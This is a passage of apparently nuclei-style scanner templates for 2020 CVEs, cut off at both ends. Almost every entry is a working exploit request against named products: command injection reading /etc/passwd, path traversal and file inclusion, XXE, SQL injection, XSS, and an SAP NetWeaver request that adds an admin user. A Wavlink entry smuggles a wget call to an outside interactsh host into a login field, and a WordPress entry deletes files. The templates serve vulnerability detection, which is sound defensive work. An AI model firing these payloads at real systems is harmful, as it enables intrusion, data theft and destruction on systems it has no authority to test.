{{RootURL}}/authentication/login\n\nuser_id={{username}}&password={{password}}&stay_logged_in=on&login=Login\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-8163","info":{"name":"Ruby on Rails <5.0.1 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3187","info":{"name":"Cisco Adaptive Security Appliance Software/Cisco Firepower Threat Defense - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOE+/session_password.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["webvpn","Webvpn"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7980","info":{"name":"Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/libagent.cgi?type=J HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nCookie: ctr_t=0; sid=123456789\n\n{\"O_\": \"A\", \"F_\": \"EXEC_CMD\", \"S_\": 123456789, \"P1_\": {\"Q\": \"cat /etc/passwd\", \"F\": \"EXEC_CMD\"}, \"V_\": 1}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9054","info":{"name":"Zyxel NAS Firmware 5.21- Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9315","info":{"name":"Oracle iPlanet Web Server 7.0.x - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2","{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4"],"matchers-condition":"and","matchers":[{"type":"word","words":["Admin Console"]},{"type":"word","words":["serverConfigurationsGeneral","serverCertificatesGeneral"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22840","info":{"name":"b2evolution CMS <6.11.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-11455","info":{"name":"LimeSurvey 4.1.11 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35847","info":{"name":"Agentejo Cockpit <0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"nonexistent_function\"\n  }\n}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_1","regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_1","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"(error404)([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_2","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]}]}]},{"id":"CVE-2020-17362","info":{"name":"Nova Lite < 1.3.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["nova-lite"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13117","info":{"name":"Wavlink Multiple AP - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["parent.location.replace"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35951","info":{"name":"Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92\n\n\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"action\"\n\nqsm_remove_file_fd_question\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"file_url\"\n\n{{fullpath}}wp-content/plugins/quiz-master-next/README.md\n------WebKitFormBoundaryBJ17hSJBjuGrnW92--\n","GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')"]},{"type":"word","part":"body","words":["{\"type\":\"success\",\"message\":\"File removed successfully\"}"]}],"extractors":[{"type":"regex","name":"fullpath","group":1,"regex":["not found in <b>([/a-z_]+)wp"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-9036","info":{"name":"Jeedom <=4.0.38 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>document.title = \"\";alert(document.domain);\" - Jeedom\"</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19360","info":{"name":"FHEM 6.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24912","info":{"name":"QCube Cross-Site-Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/assets/_core/php/profile.php","{{BaseURL}}/assets/php/profile.php","{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php"],"body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('xss')</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]}]}]},{"id":"CVE-2020-5191","info":{"name":"PHPGurukul Hospital Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /hospital/hms/admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&submit=&submit=\n","POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndoctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<td class=\"hidden-xs\"></td><script>alert(document.domain);</script><td>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5192","info":{"name":"Hospital Management System 4.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hospital/hms/doctor/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}password={{password}}&submit=&submit=\n","POST /hospital/hms/doctor/search.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17518","info":{"name":"Apache Flink 1.5.1 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /jars/upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y\n\n------WebKitFormBoundaryoZ8meKnrrso89R6Y\nContent-Disposition: form-data; name=\"jarfile\"; filename=\"../../../../../../../tmp/poc\"\n\n{{randstr}}\n------WebKitFormBoundaryoZ8meKnrrso89R6Y--\n","GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr}}\") && status_code == 200"]}]}]},{"id":"CVE-2020-26413","info":{"name":"Gitlab CE/EE 13.4 - 13.6.2 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"query\": \"{\\nusers {\\nedges {\\n  node {\\n    username\\n    email\\n    avatarUrl\\n    status {\\n      emoji\\n      message\\n      messageHtml\\n     }\\n    }\\n   }\\n  }\\n }\",\n  \"variables\": null,\n  \"operationName\": null\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"avatarUrl\":","\"node\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.edges[].node.email"],"part":"body"}]}]},{"id":"CVE-2020-18268","info":{"name":"Z-Blog <=1.5.2 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /zb_system/cmd.php?act=verify HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 81\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nbtnPost=Log+In&username={{username}}&password={{md5(\"{{password}}\")}}&savedate=0\n","GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-5405","info":{"name":"Spring Cloud Config - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24223","info":{"name":"Mara CMS  7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19295","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","JEESNS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8641","info":{"name":"Lotus Core CMS 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9402","info":{"name":"Django SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1"],"matchers":[{"type":"word","words":["DatabaseError at","ORA-29257:","ORA-06512:","Request Method:"],"condition":"and"}]}]},{"id":"CVE-2020-36289","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin","{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rel=\\\"admin\\\""]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9757","info":{"name":"Craft CMS < 3.3.0 - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}","{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["MetaLinkContainer","canonical","22344"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35729","info":{"name":"Klog Server <=2.41 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/actions/authenticate.php"],"body":"user={{dummy}}%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd={{dummy}}","matchers":[{"type":"word","words":["poc-testing"]}]}]},{"id":"CVE-2020-14864","info":{"name":"Oracle Fusion - Directory Traversal/Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1","{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13158","info":{"name":"Artica Proxy Community Edition <4.30.000000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27467","info":{"name":"Processwire CMS <2.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7318","info":{"name":"McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Policy Name","'\"><svg/onload=alert(document.domain)>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6287","info":{"name":"SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition","severity":"critical"},"requests":[{"raw":["POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>\n  CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==\n</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CTCWebServiceSi","SOAP-ENV"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24148","info":{"name":"Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=moove_read_xml"],"body":"type=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-17519","info":{"name":"Apache Flink - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26876","info":{"name":"WordPress WP Courses Plugin Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/lesson/1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["rest_post_invalid_id","\"(guid|title|content|excerpt)\":{\"rendered\":"],"condition":"or"},{"type":"status","status":[200,404],"condition":"or"}]}]},{"id":"CVE-2020-25078","info":{"name":"D-Link DCS-2530L/DCS-2670L  - Administrator Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/config/getuser?index=0"],"matchers-condition":"and","matchers":[{"type":"word","words":["name=","pass="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17506","info":{"name":"Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"],"host-redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","words":["artica-applianc"]},{"type":"word","part":"header","words":["PHPSESSID"]},{"type":"status","status":[200,301,302],"condition":"or"}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2020-35234","info":{"name":"SMTP WP Plugin Directory Listing","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/easy-wp-smtp/","{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/"],"matchers":[{"type":"word","words":["debug","log","Index of"],"condition":"and"}]}]},{"id":"CVE-2020-11991","info":{"name":"Apache Cocoon 2.1.12 - XML Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/v2/api/product/manger/getInfo"],"body":"<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<userInfo>\n<firstName>John</firstName>\n<lastName>&ent;</lastName>\n</userInfo>\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3580","info":{"name":"Cisco ASA/FTD Software - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/{{randstr}}/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9376","info":{"name":"D-Link DIR-610 Devices - Information Disclosure","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>Admin</name>","</usrid>","</password>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10973","info":{"name":"WAVLINK - Access Control","severity":"high"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-21224","info":{"name":"Inspur ClusterEngine 4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"op=login&username=;`cat /etc/passwd`&password=\n","headers":{"Content-Type":"application/x-www-form-urlencoded","Referer":"{{Hostname}}/module/login/login.html"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8209","info":{"name":"Citrix XenMobile Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["fileDownload=true","application/octet-stream","attachment;"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-19282","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6308","info":{"name":"SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /AdminTools/querybuilder/logon?framework= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"location","words":["{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"]}]}]},{"id":"CVE-2020-3452","info":{"name":"Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../","{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"],"matchers":[{"type":"word","words":["INTERNAL_PASSWORD_ENABLED","CONF_VIRTUAL_KEYBOARD"],"condition":"and"}]}]},{"id":"CVE-2020-13820","info":{"name":"Extreme Management Center 8.4.1.24 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus='alert(document.domain)","Extreme Management Center"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15867","info":{"name":"Gogs 0.5.5 - 0.12.2 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: 